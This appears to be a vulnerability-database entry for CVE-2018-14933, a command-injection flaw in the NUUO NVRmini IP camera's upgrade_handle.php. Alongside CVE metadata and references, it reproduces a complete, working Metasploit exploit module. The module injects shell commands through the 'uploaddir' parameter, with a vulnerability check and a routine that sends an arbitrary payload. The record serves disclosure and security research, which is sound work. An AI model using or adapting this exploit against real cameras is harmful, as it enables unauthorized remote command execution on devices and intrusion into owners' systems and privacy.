ID
VAR-E-201812-0168
CVE
| cve_id: | CVE-2018-14933 | Trust: 1.5 |
| cve_id: | CVE-2018-15716 | Trust: 0.5 |
EDB ID
46340
TITLE
NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit) - PHP remote Exploit
Trust: 0.6
DESCRIPTION
NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit). CVE-2018-14933 . remote exploit for PHP platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | nuuo | model: | nvrmini | scope: | - | version: | - | Trust: 1.6 |
| vendor: | nuuo | model: | nvrmini2 | scope: | eq | version: | 3.9.1 | Trust: 1.1 |
| vendor: | nuuo | model: | nvrmini upgrade handle.php remote | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'NUUO NVRmini upgrade_handle.php Remote Command Execution',
'Description' => %q{
This exploits a vulnerability in the web application of NUUO NVRmini IP camera,
which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Berk Dusunur', # @berkdusunur
'numan turle' # @numanturle
],
'References' =>
[
['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
['URL', 'https://www.tenable.com/security/research/tra-2018-41'],
['CVE', '2018-14933'],
['EDB', '45070']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => %w{ unix win linux },
'Arch' => ARCH_CMD,
'Targets' => [ ['NUUO NVRmini', { }], ],
'DisclosureDate' => 'Aug 04 2018',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'),
'vars_get' =>
{
'cmd' => 'writeuploaddir',
'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
}}
)
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 200 && res.body =~ /upload_tmp_dir/
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'cmd' => 'writeuploaddir',
'uploaddir' => "';"+cmd+";'"
}}
)
unless res
fail_with(Failure::Unknown, 'Failed to execute the command.')
end
res
end
def exploit
http_send_command(payload.encoded)
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
upgrade_handle.php Remote Command Execution (Metasploit)
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | Remote | Trust: 1.0 |
| tag: | web | Trust: 0.5 |
| tag: | php | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | TENABLE | id: | TRA-2018-41 | Trust: 3.2 |
| db: | EXPLOIT-DB | id: | 46340 | Trust: 1.6 |
| db: | NVD | id: | CVE-2018-14933 | Trust: 1.5 |
| db: | EDBNET | id: | 100971 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 31736 | Trust: 0.6 |
| db: | EDBNET | id: | 100475 | Trust: 0.6 |
| db: | NVD | id: | CVE-2018-15716 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 150624 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 151573 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-14933 | Trust: 1.5 |
| url: | https://raw.githubusercontent.com/rapid7/metasploit-framework/3a1259297607193363a01b0c8498e0f3cd085079/modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/46340/ | Trust: 0.6 |
| url: | https://0day.today/exploits/31736 | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-15716 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 150624 |
| db: | PACKETSTORM | id: | 151573 |
| db: | EXPLOIT-DB | id: | 46340 |
| db: | EDBNET | id: | 100971 |
| db: | EDBNET | id: | 100475 |
LAST UPDATE DATE
2022-07-27T09:24:09.017000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 150624 | date: | 2018-12-05T09:02:22 |
| db: | PACKETSTORM | id: | 151573 | date: | 2019-02-07T16:40:36 |
| db: | EXPLOIT-DB | id: | 46340 | date: | 2019-02-11T00:00:00 |
| db: | EDBNET | id: | 100971 | date: | 2019-02-11T00:00:00 |
| db: | EDBNET | id: | 100475 | date: | 2018-12-12T00:00:00 |